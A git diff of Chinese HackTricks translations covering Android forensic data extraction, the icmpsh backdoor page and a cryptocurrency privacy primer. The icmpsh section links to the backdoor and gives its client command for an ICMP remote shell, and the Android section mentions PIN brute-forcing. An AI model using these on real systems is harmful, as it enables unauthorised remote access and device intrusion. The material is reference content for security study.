我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %} ## 锁定设备 -要开始从 Android 设备提取数据,设备必须是解锁状态。如果设备被锁定,您可以: +要开始从 Android 设备中提取数据,必须先解锁设备。如果设备已锁定,您可以: -* 检查设备是否激活了 USB 调试。 -* 检查可能的[污迹攻击](https://www.usenix.org/legacy/event/woot10/tech/full_papers/Aviv.pdf) -* 尝试使用[暴力破解](https://www.cultofmac.com/316532/this-brute-force-device-can-crack-any-iphones-pin-code/) +* 检查设备是否启用了通过 USB 调试。 +* 检查可能的 [指纹攻击](https://www.usenix.org/legacy/event/woot10/tech/full\_papers/Aviv.pdf) +* 尝试使用 [暴力破解](https://www.cultofmac.com/316532/this-brute-force-device-can-crack-any-iphones-pin-code/) ## 数据获取 -使用 adb 创建[android 备份](mobile-pentesting/android-app-pentesting/adb-commands.md#backup)并使用 [Android Backup Extractor](https://sourceforge.net/projects/adbextractor/) 提取:`java -jar abe.jar unpack file.backup file.tar` +使用 adb 创建一个 [android 备份](mobile-pentesting/android-app-pentesting/adb-commands.md#backup),然后使用 [Android Backup Extractor](https://sourceforge.net/projects/adbextractor/) 提取它:`java -jar abe.jar unpack file.backup file.tar` -### 如果有 root 权限或物理连接到 JTAG 接口 +### 如果有 root 访问权限或物理连接到 JTAG 接口 -* `cat /proc/partitions`(搜索闪存的路径,通常第一个条目是 _mmcblk0_,对应整个闪存)。 +* `cat /proc/partitions`(查找闪存的路径,通常第一个条目是 _mmcblk0_,对应整个闪存)。 * `df /data`(发现系统的块大小)。 -* dd if=/dev/block/mmcblk0 of=/sdcard/blk0.img bs=4096(使用从块大小收集的信息执行)。 +* dd if=/dev/block/mmcblk0 of=/sdcard/blk0.img bs=4096(使用从块大小获取的信息执行)。 ### 内存 -使用 Linux Memory Extractor (LiME) 提取 RAM 信息。它是一个内核扩展,应通过 adb 加载。 +使用 Linux Memory Extractor (LiME) 提取 RAM 信息。这是一个应通过 adb 加载的内核扩展。 + +{% hint style="success" %} +学习并练习 AWS 黑客:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并练习 GCP 黑客:[**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-从零开始学习 AWS 黑客技术,成为 htARTE (HackTricks AWS 红队专家) +支持 HackTricks -支持 HackTricks 的其他方式: - -* 如果您想在 HackTricks 中看到您的**公司广告**或**下载 HackTricks 的 PDF 版本**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com) -* 发现[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs 集合**](https://opensea.io/collection/the-peass-family) -* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或在 **Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。** -* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来**分享您的黑客技巧**。 +* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %} diff --git a/backdoors/icmpsh.md b/backdoors/icmpsh.md index 897df6d21..aef3c480c 100644 --- a/backdoors/icmpsh.md +++ b/backdoors/icmpsh.md @@ -1,16 +1,17 @@ +{% hint style="success" %} +学习并练习AWS Hacking:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并练习GCP Hacking: [**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习AWS黑客技术,成为专家,使用 htARTE(HackTricks AWS Red Team Expert) +支持 HackTricks -支持HackTricks的其他方式: - -* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) -* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family) -* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %} 从以下链接下载后门:[https://github.com/inquisb/icmpsh](https://github.com/inquisb/icmpsh) @@ -35,16 +36,17 @@ read IP ```bash icmpsh.exe -t -d 500 -b 30 -s 128 ``` +{% hint style="success" %} +学习并练习AWS黑客技术:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并练习GCP黑客技术: [**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家) +支持 HackTricks -其他支持HackTricks的方式: - -* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) -* 探索我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品,称为[**The PEASS Family**](https://opensea.io/collection/the-peass-family) -* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %} diff --git a/blockchain/blockchain-and-crypto-currencies/README.md b/blockchain/blockchain-and-crypto-currencies/README.md index a62d2204d..29b478bb8 100644 --- a/blockchain/blockchain-and-crypto-currencies/README.md +++ b/blockchain/blockchain-and-crypto-currencies/README.md @@ -1,283 +1,153 @@ +{% hint style="success" %} +学习并练习AWS黑客技术:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并练习GCP黑客技术:[**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家) +支持 HackTricks -支持HackTricks的其他方式: - -* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) -* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family) -* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 查看[**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %} -# 基本术语 +## 基本概念 -* **智能合约**:智能合约简单地说就是**存储在区块链上的程序**,当满足预定条件时运行。它们通常用于自动化**协议的执行**,以便所有参与者可以立即确定结果,无需任何中介的参与或时间损失。(来源:[这里](https://www.ibm.com/topics/smart-contracts))。 -* 基本上,智能合约是一段**代码**,当人们访问并接受合约时将被执行。智能合约**在区块链上运行**(因此结果被存储为不可变),人们可以在接受之前阅读它们。 -* **dApps**:**去中心化应用程序**是在**智能合约**之上实现的。它们通常具有用户可以与应用程序交互的前端,**后端**是公开的(因此可以进行审计)并且实现为**智能合约**。有时需要使用数据库,以太坊区块链为每个帐户分配一定的存储空间。 -* **代币和硬币**:**硬币**是一种作为**数字货币**的加密货币,而**代币**是代表一些**价值**但不是硬币的东西。 -* **实用性代币**:这些代币允许用户**稍后访问某些服务**(在特定环境中具有某些价值)。 -* **安全性代币**:这些代表**所有权**或某些资产。 -* **DeFi**:**去中心化金融**。 -* **DEX:去中心化交易平台**。 -* **DAOs**:**去中心化自治组织**。 +- **智能合约**被定义为在满足特定条件时在区块链上执行的程序,自动化协议执行而无需中介。 +- **去中心化应用 (dApps)** 建立在智能合约之上,具有用户友好的前端和透明、可审计的后端。 +- **代币 & 货币** 区分了货币作为数字货币,而代币代表特定情境中的价值或所有权。 +- **实用性代币** 授予对服务的访问权限,而 **安全性代币** 表示资产所有权。 +- **DeFi** 代表去中心化金融,提供无需中央机构的金融服务。 +- **DEX** 和 **DAOs** 分别指去中心化交易平台和去中心化自治组织。 -# 共识机制 +## 共识机制 -要使区块链交易得到承认,必须将其**附加**到**区块链**上。验证者(矿工)执行此附加操作;在大多数协议中,他们**为此获得奖励**。为了保持区块链的安全性,必须有一种机制来**防止恶意用户或组织接管大多数验证**。 +共识机制确保在区块链上进行安全且达成一致的交易验证: +- **工作量证明 (PoW)** 依赖计算能力进行交易验证。 +- **权益证明 (PoS)** 要求验证者持有一定数量的代币,相较于 PoW 减少能源消耗。 -工作量证明,另一种常用的共识机制,使用计算能力的验证来验证交易,要求潜在攻击者获取验证者网络大部分计算能力的大部分。 +## 比特币基础知识 -## 工作量证明(PoW) +### 交易 -这使用**计算能力验证**来验证交易,要求潜在攻击者获取验证者网络大部分计算能力的大部分。\ -**矿工**将**选择几笔交易**,然后开始**计算工作量证明**。**具有最大计算资源的矿工**更有可能**更早完成**工作量证明并获得所有交易的费用。 +比特币交易涉及在地址之间转移资金。交易通过数字签名进行验证,确保只有私钥的所有者可以发起转账。 -## 权益证明(PoS) +#### 关键组件: -PoS通过**要求验证者拥有一定数量的区块链代币**来实现这一点,要求**潜在攻击者获取区块链上大部分代币**以发动攻击。\ -在这种共识机制中,矿工拥有的代币越多,矿工被要求创建下一个区块的可能性就越大。\ -与PoW相比,这大大**减少了矿工消耗的能量**。 +- **多重签名交易** 需要多个签名来授权交易。 +- 交易包括 **输入** (资金来源)、**输出** (目的地)、**费用** (支付给矿工) 和 **脚本** (交易规则)。 -# 比特币 +### 闪电网络 -## 交易 +旨在通过允许通道内的多个交易,仅向区块链广播最终状态来增强比特币的可扩展性。 -简单的**交易**是从一个地址向另一个地址的**资金转移**。\ -在比特币中,一个**地址**是**公钥**的哈希值,因此,为了从地址进行交易,某人需要知道与该公钥(地址)关联的私钥。\ -然后,当执行**交易**时,它会使用地址的私钥进行**签名**,以显示交易的**合法性**。 +## 比特币隐私问题 -在比特币中生成数字签名的第一部分可以用以下数学方式表示:\ -_**Sig**_ = _**Fsig**_(_**Fhash**_(_**m**_),_**dA**_) - -其中: - -* \_d\_A是签名**私钥** -* _m_是**交易** -* Fhash是哈希函数 -* Fsig是签名算法 -* Sig是生成的签名 - -签名函数(Fsig)生成一个包含两个值R和S的签名: - -* Sig = (R, S) - -一旦计算出R和S,它们将被序列化为一个字节流,然后使用称为Distinguished Encoding Rules(DER)的国际标准编码方案进行编码。为了验证签名的有效性,将使用签名验证算法。验证数字签名需要以下内容: - -* 签名(R和S) -* 交易哈希 -* 与用于创建交易签名的私钥对应的公钥 - -签名验证算法有效地意味着只有私钥的所有者(生成公钥的私钥)才能在交易上生成签名。如果签名有效,则签名验证算法将返回“TRUE”。 - -### 多重签名交易 - -多重签名**地址**是与多个ECDSA私钥关联的地址。最简单的类型是m-of-n地址 - 它与n个私钥关联,并且从该地址发送比特币需要至少m个密钥的签名。多重签名**交易**是从多重签名地址发送资金的交易。 - -### 交易字段 - -每个比特币交易都有几个字段: - -* **输入**:**比特币**从哪个地址**转移** -* **输出**:转移到**每个**输出的地址和金额 -* **费用**:支付给交易矿工的金额 -* **Script\_sig**:交易的脚本签名 -* **Script\_type**:交易类型 - -有**2种主要类型**的交易: - -* **P2PKH:“支付到公钥哈希”**:这是交易的执行方式。您要求**发送方**提供有效的**签名**(来自私钥)和**公钥**。交易输出脚本将使用签名和公钥,并通过一些加密函数检查**是否与公钥哈希匹配**,如果匹配,则**资金**将是**可支配的**。这种方法将公钥以哈希形式隐藏,以提供额外的安全性。 -* **P2SH:“支付到脚本哈希”**:交易的输出只是**脚本**(这意味着想要这笔钱的人发送一个脚本),如果**使用特定参数执行将导致布尔值为`true`或`false`**。如果矿工使用提供的参数运行输出脚本并结果为`true`,则**资金将发送到您想要的输出**。`P2SH`用于**多重签名**钱包,使输出脚本成为**在接受交易之前检查多个签名的逻辑**。`P2SH`也可用于允许任何人或没有人花费资金。如果P2SH交易的输出脚本只是`1`表示为true,则尝试在不提供参数的情况下花费输出将导致`1`,使尝试花费资金的任何人都可以花费。这也适用于返回`0`的脚本,使输出对任何人都不可花费。 - -## 闪电网络 - -该协议有助于**向通道执行多个交易**,并**仅**将**最终状态**发送到区块链以保存。\ -这**提高了**比特币区块链的**速度**(每秒仅允许7笔支付),并允许创建**更难追踪的交易**,因为通道是通过比特币区块链的节点创建的: - -![](<../../.gitbook/assets/image (611).png>) - -闪电网络的正常使用包括通过向相关基础区块链(第1层)承诺资金交易来**打开支付通道**,然后进行**任意数量**的闪电网络**交易**,更新通道资金的暂定分配**而无需将其广播到区块链**,最后通过**广播**解决交易的**最终版本**来关闭支付通道以分配通道资金。 - -请注意,通道的任一成员都可以随时停止并将通道的最终状态发送到区块链。 - -# 比特币隐私攻击 - -## 共同输入 - -理论上,一笔交易的输入可以属于不同的用户,但实际上这是不常见的,因为这需要额外的步骤。因此,很多时候可以假定**同一笔交易中的2个输入地址属于同一所有者**。 - -## UTXO找零地址检测 - -**UTXO**表示**未花费的交易输出**(UTXOs)。在使用来自先前交易的输出作为输入的交易中,**整个输出需要被花费**(以避免双重花费攻击)。因此,如果意图是仅**发送**该输出的一部分资金到一个地址并**保留**另一部分资金,将会出现**2个不同的输出**:预期的输出和一个**随机新的找零地址**,剩余资金将保存在其中。 - -然后,观察者可以假设**生成的新找零地址属于UTXO的所有者**。 - -## 社交网络和论坛 - -一些人在互联网上的不同网站上提供有关他们比特币地址的数据。**这使得很容易识别地址的所有者**。 - -## 交易图 - -通过以图形方式表示交易,**有可能以一定概率知道账户资金的去向**。因此,可以了解与**区块链中相关的用户**的一些信息。 - -## **不必要的输入启发式** - -也称为“最佳找零启发式”。考虑这笔比特币交易。它有两个价值分别为2 BTC和3 BTC的输入以及价值为4 BTC和1 BTC的两个输出。 -``` -2 btc --> 4 btc -3 btc 1 btc -``` -假设其中一个输出是找零,另一个输出是支付。有两种解释:支付输出要么是4 BTC输出,要么是1 BTC输出。但如果1 BTC输出是支付金额,那么3 BTC输入就是不必要的,因为钱包本可以只花费2 BTC输入并支付更低的矿工费用。这表明真正的支付输出是4 BTC,而1 BTC是找零输出。 - -这对于具有多个输入的交易是一个问题。修复此泄漏的一种方法是添加更多输入,直到找零输出高于任何输入,例如: -``` -2 btc --> 4 btc -3 btc 6 btc -5 btc -``` -## 强制地址重用 - -**强制地址重用**或**激励地址重用**是指对已在区块链上使用过的地址支付(通常是小额)比特币的对手。对手希望用户或其钱包软件**将这些支付用作更大交易的输入,从而通过共同输入所有权**启发式揭示其他地址。这些支付可以被理解为一种迫使地址所有者无意中重用地址的方式。 - -这种攻击有时被错误地称为**尘埃攻击**。 - -钱包的正确行为是不要花费已经落入已使用空地址的硬币。 - -## 其他区块链分析 - -* **确切的支付金额**:为了避免带有找零的交易,支付需要等于UTXO(这是非常不寻常的)。因此,**没有找零地址的交易可能是同一用户之间的转账**。 -* **整数金额**:在交易中,如果输出之一是“**整数金额**”,那么很可能这是**支付给将该“整数金额”作为价格的人**,因此另一部分必须是剩余部分。 -* **钱包指纹识别**:仔细的分析师有时可以推断出哪个软件创建了某个交易,因为**许多不同的钱包软件并不总是以完全相同的方式创建交易**。钱包指纹识别可用于检测找零输出,因为找零输出是使用相同钱包指纹花费的输出。 -* **金额和时间相关性**:如果执行交易的人**披露**了交易的**时间**和/或**金额**,那么这很容易**被发现**。 - -## 流量分析 - -一些组织**窃听您的流量**可能会看到您在比特币网络中通信。\ -如果对手看到一个交易或区块**从您的节点发出而之前没有进入**,那么几乎可以确定**该交易是由您进行的或该区块是由您挖掘的**。由于涉及互联网连接,对手将能够**将IP地址与发现的比特币信息联系起来**。 - -无法窃听所有互联网流量但拥有**大量比特币节点**以便**更接近**源的攻击者可能能够知道宣布交易或区块的IP地址。\ -此外,一些钱包定期重新广播其未确认的交易,以便更有可能通过网络广泛传播并被挖掘。 - -## 其他攻击以查找地址所有者信息 - -有关更多攻击,请阅读[https://en.bitcoin.it/wiki/Privacy](https://en.bitcoin.it/wiki/Privacy) - -# 匿名比特币 +隐私攻击,如 **共同输入所有权** 和 **UTXO 更改地址检测**,利用交易模式。像 **混币** 和 **CoinJoin** 这样的策略通过模糊用户之间的交易链接来提高匿名性。 ## 匿名获取比特币 -* **现金交易**:使用现金购买比特币。 -* **现金替代品**:购买礼品卡或类似物品,并在线交换它们为比特币。 -* **挖矿**:挖矿是获取比特币最匿名的方式。这适用于独立挖矿,因为[挖矿池](https://en.bitcoin.it/wiki/Pooled\_mining)通常知道哈希者的IP地址。 -* **盗窃**:理论上,另一种获取匿名比特币的方式是窃取它们。 +方法包括现金交易、挖矿和使用混币。**CoinJoin** 将多个交易混合在一起以增加追踪难度,而 **PayJoin** 将 CoinJoin 伪装成常规交易以提高隐私性。 +```bash +2 btc --> 4 btc +3 btc 1 btc +``` +## **强制地址重用** + +攻击者可能向先前使用过的地址发送小额金额,希望接收方在未来交易中将这些金额与其他输入合并,从而将地址关联在一起。 + +### 正确的钱包行为 +钱包应避免使用已经使用过且为空的地址收到的硬币,以防止这种隐私泄漏。 + +## **其他区块链分析技术** + +- **确切的支付金额:** 没有找零的交易很可能是同一用户拥有的两个地址之间的交易。 +- **整数金额:** 交易中的整数金额表明这是一笔付款,而非整数输出很可能是找零。 +- **钱包指纹识别:** 不同的钱包具有独特的交易创建模式,允许分析人员识别所使用的软件,可能还有找零地址。 +- **金额和时间相关性:** 披露交易时间或金额可能使交易可追踪。 + +## **流量分析** + +通过监视网络流量,攻击者可能将交易或区块与 IP 地址关联起来,危及用户隐私。如果一个实体运行许多比特币节点,尤其是真实,这一点尤为真实,这将增强他们监视交易的能力。 + +## 更多 +有关隐私攻击和防御的全面列表,请访问[比特币维基上的比特币隐私](https://en.bitcoin.it/wiki/Privacy)。 + +# 匿名比特币交易 + +## 匿名获取比特币的方法 + +- **现金交易:** 通过现金获取比特币。 +- **现金替代品:** 购买礼品卡并在线兑换比特币。 +- **挖矿:** 通过挖矿赚取比特币是最私密的方法,尤其是在独自进行挖矿时,因为挖矿池可能知道矿工的 IP 地址。[挖矿池信息](https://en.bitcoin.it/wiki/Pooled_mining) +- **盗窃:** 理论上,窃取比特币可能是另一种匿名获取比特币的方法,尽管这是非法的,不建议这样做。 ## 混币服务 -用户会**将比特币发送到混币服务**,服务会**发送不同的比特币回给用户**,扣除一定费用。理论上,观察区块链的对手将**无法将**进入和离开的交易**联系起来**。 - -然而,用户需要信任混币服务将比特币退还,并且不会保存有关接收和发送资金之间关系的日志。\ -还可以使用其他服务作为混币服务,例如比特币赌场,您可以在那里发送比特币,稍后取回。 +通过使用混币服务,用户可以**发送比特币**并收到**不同的比特币作为回报**,这使得追踪原始所有者变得困难。然而,这需要对服务的信任,不要保留日志并确实返还比特币。替代混币选项包括比特币赌场。 ## CoinJoin -**CoinJoin**将**不同用户的多个交易混合成一个**,以使观察者更难找出**哪个输入与哪个输出相关**。\ -这提供了新的隐私级别,但是,**某些** **交易**,其中某些输入和输出金额相关或与其他输入和输出非常不同**仍然可以被外部观察者关联**。 +**CoinJoin**将来自不同用户的多个交易合并为一个交易,使试图将输入与输出匹配的人的过程变得复杂。尽管其有效性,具有独特输入和输出大小的交易仍可能被追踪。 -比特币区块链上可能的CoinJoin交易ID示例为`402d3e1df685d1fdf82f36b220079c1bf44db227df2d676625ebcbee3f6cb22a`和`85378815f6ee170aa8c26694ee2df42b99cff7fa9357f073c1192fff1f540238`。 +可能使用 CoinJoin 的示例交易包括 `402d3e1df685d1fdf82f36b220079c1bf44db227df2d676625ebcbee3f6cb22a` 和 `85378815f6ee170aa8c26694ee2df42b99cff7fa9357f073c1192fff1f540238`。 -[**https://coinjoin.io/en**](https://coinjoin.io/en)\ -**类似于CoinJoin但更好,对于以太坊,您可以使用** [**Tornado Cash**](https://tornado.cash) **(资金来自矿工,因此它只会出现在您的钱包中)。** +欲了解更多信息,请访问[CoinJoin](https://coinjoin.io/en)。对于以太坊上类似的服务,请查看[Tornado Cash](https://tornado.cash),该服务使用矿工资金匿名化交易。 ## PayJoin -在前一节讨论的CoinJoin类型可以通过检查具有相同价值的多个输出来轻松识别。 - -PayJoin(也称为支付到终点或P2EP)是两方之间的一种特殊类型的CoinJoin,其中一方支付另一方。然后,交易**没有具有相同价值的多个输出**,因此不会明显显示为具有相同输出的CoinJoin。考虑这个交易: -``` +作为 CoinJoin 的变体,**PayJoin**(或 P2EP)将交易伪装成两个当事方(例如,客户和商家)之间的常规交易,而不具有 CoinJoin 特有的等额输出特征。这使得它极其难以检测,并可能使交易监视实体使用的共同输入所有权启发式失效。 +```plaintext 2 btc --> 3 btc 5 btc 4 btc ``` -# 比特币隐私良好实践 +# 加密货币隐私的最佳实践 -## 钱包同步 +## **钱包同步技术** -比特币钱包必须以某种方式获取有关其余额和历史记录的信息。截至2018年底,最实用和私密的现有解决方案是使用**完整节点钱包**(最大程度上保护隐私)和**客户端端区块过滤**(非常好)。 +为了维护隐私和安全,与区块链同步钱包至关重要。有两种突出的方法: -- **完整节点:** 完整节点下载包含比特币上发生的每笔[交易](https://en.bitcoin.it/wiki/Transaction)的整个区块链。因此,监视用户的互联网连接的对手将无法了解用户感兴趣的交易或地址。 -- **客户端端区块过滤:** 客户端端区块过滤通过创建包含每个区块中每笔交易的所有地址的**过滤器**来工作。这些过滤器可以测试一个**元素是否在集合中**;虽然可能存在误报,但不存在漏报。轻量级钱包会**下载**区块链中每个**区块**的所有过滤器,并检查其**自己的地址**是否匹配。包含匹配项的区块将从点对点网络中完整下载,并且这些区块将用于获取钱包的历史记录和当前余额。 +- **完整节点**:通过下载整个区块链,完整节点确保最大程度的隐私。所有历史交易都存储在本地,使对手无法识别用户感兴趣的交易或地址。 +- **客户端端区块过滤**:该方法涉及为区块链中的每个区块创建过滤器,允许钱包识别相关交易而不向网络观察者公开特定兴趣。轻量级钱包下载这些过滤器,仅在找到与用户地址匹配的完整区块时才获取完整区块。 -## Tor +## **利用 Tor 实现匿名性** -比特币网络使用点对点网络,这意味着其他节点可以了解您的IP地址。因此,建议您**每次与比特币网络交互时都通过Tor连接**。 +鉴于比特币在点对点网络上运行,建议使用 Tor 来掩盖您的 IP 地址,在与网络交互时增强隐私。 -## 避免地址重复使用 +## **防止地址重复使用** -**地址被多次使用对隐私非常有害,因为它将更多的区块链交易链接在一起,并证明它们是由同一实体创建的**。使用比特币的最私密和安全的方式是向每个付款人发送一个全新的地址。收到的硬币花费后,该地址不应再次使用。此外,在发送比特币时应要求一个全新的比特币地址。所有良好的比特币钱包都有一个用户界面,以防止地址重复使用。 +为了保护隐私,每次交易都使用新地址至关重要。重复使用地址可能通过将交易与同一实体关联来损害隐私。现代钱包通过设计阻止地址重复使用。 -## 多笔交易 +## **交易隐私策略** -用**多笔链上交易**支付某人可以大大降低基于金额的隐私攻击的威力,例如金额相关性和整数金额。例如,如果用户想向某人支付5 BTC,并且不希望5 BTC的价值很容易被搜索到,那么他们可以发送两笔价值分别为2 BTC和3 BTC的交易,总共为5 BTC。 +- **多笔交易**:将支付拆分为多笔交易可以模糊交易金额,阻止隐私攻击。 +- **避免找零**:选择不需要找零输出的交易可通过破坏找零检测方法来增强隐私。 +- **多个找零输出**:如果避免找零不可行,生成多个找零输出仍然可以提高隐私性。 -## 避免找零 +# **门罗币:匿名的典范** -避免找零是指仔细选择交易输入和输出,以完全不需要找零输出。**没有找零输出对隐私非常有利**,因为它破坏了找零检测启发式。 +门罗币满足了数字交易中绝对匿名的需求,为隐私设定了高标准。 -## 多个找零输出 +# **以太坊:Gas 和交易** -如果避免找零不可行,则**创建多个找零输出可以提高隐私**。这也会破坏通常假定只有一个找零输出的找零检测启发式。由于此方法使用的区块空间比通常多,因此避免找零更可取。 +## **理解 Gas** -# 门罗币 +Gas 衡量在以太坊上执行操作所需的计算工作量,以 **gwei** 定价。例如,一笔花费 2,310,000 gwei(或 0.00231 ETH)的交易涉及 gas 限制、基本费用和用于激励矿工的小费。用户可以设置最大费用以确保不过度支付,多余部分将退还。 -当门罗币开发时,它试图解决的迫切需求是**完全匿名**,在很大程度上,它填补了这一空白。 +## **执行交易** -# 以太坊 +以太坊中的交易涉及发送方和接收方,可以是用户或智能合约地址。它们需要支付费用并且必须被挖掘。交易中的基本信息包括接收方、发送方的签名、价值、可选数据、gas 限制和费用。值得注意的是,发送方的地址是从签名中推断出来的,因此在交易数据中不需要它。 -## Gas - -Gas指的是衡量以太坊网络上执行特定操作所需的**计算工作量**的单位。Gas是成功进行以太坊**交易**所需的**费用**。 - -Gas价格以**gwei**表示,gwei本身是ETH的一个单位 - 每个gwei等于**0.000000001 ETH**(10的-9次方ETH)。例如,您可以说您的gas费用为1 gwei,而不是说您的gas费用为0.000000001 ether。'gwei'这个词本身意味着'吉博-韦',它等于**1,000,000,000 wei**。Wei本身是**ETH的最小单位**。 - -要计算交易将花费的gas,请阅读以下示例: - -假设Jordan必须向Taylor支付1 ETH。在交易中,gas限制为21,000单位,基本费用为100 gwei。Jordan还包括10 gwei的小费。 - -使用上述公式,我们可以计算为`21,000 * (100 + 10) = 2,310,000 gwei`或0.00231 ETH。 - -当Jordan发送资金时,将从Jordan的账户中扣除1.00231 ETH。Taylor将收到1.0000 ETH。矿工将获得0.00021 ETH的小费。基本费用0.0021 ETH被销毁。 - -此外,Jordan还可以为交易设置一个最大费用(`maxFeePerGas`)。实际费用与最大费用之间的差额将退还给Jordan,即`refund = max fee - (base fee + priority fee)`。Jordan可以设置一个最大支付交易执行的金额,并在交易执行时不必担心支付超出基本费用的费用。 - -由于基本费用是根据对区块空间的需求由网络计算的,因此最后一个参数:maxFeePerGas有助于控制将支付的最大费用。 - -## 交易 - -请注意,在**以太坊**网络中,交易是在2个地址之间执行的,这些地址可以是**用户或智能合约地址**。\ -**智能合约**通过**特殊**的**交易**存储在分布式分类账中。 - -改变EVM状态的交易需要广播到整个网络。任何节点都可以广播要求在EVM上执行交易;发生这种情况后,**矿工**将**执行**交易并将结果状态更改传播到网络的其余部分。\ -交易需要**费用**,必须进行挖矿才能变得有效。 - -提交的交易包括以下信息: - -- `recipient` – 接收地址(如果是外部拥有的账户,则交易将转移价值。如果是合同账户,则交易将执行合同代码) -- `signature` – 发件人的标识符。当发件人的私钥签署交易并确认发件人已授权此交易时,将生成此标识符 -- `value` – 从发件人转移到接收方的ETH金额(以WEI为单位,是ETH的一个单位) -- `data` – 包含任意数据的可选字段 -- `gasLimit` – 交易可以消耗的最大gas单位数量。gas单位代表计算步骤 -- `maxPriorityFeePerGas` - 包含为矿工提供的小费的最大gas数量 -- `maxFeePerGas` - 为交易愿意支付的最大gas数量(包括`baseFeePerGas`和`maxPriorityFeePerGas`) - -请注意,没有任何字段用于原始地址,这是因为这可以从签名中推断出来。 +这些实践和机制对于任何希望参与加密货币并优先考虑隐私和安全性的人来说都是基础性的。 ## 参考资料 -- 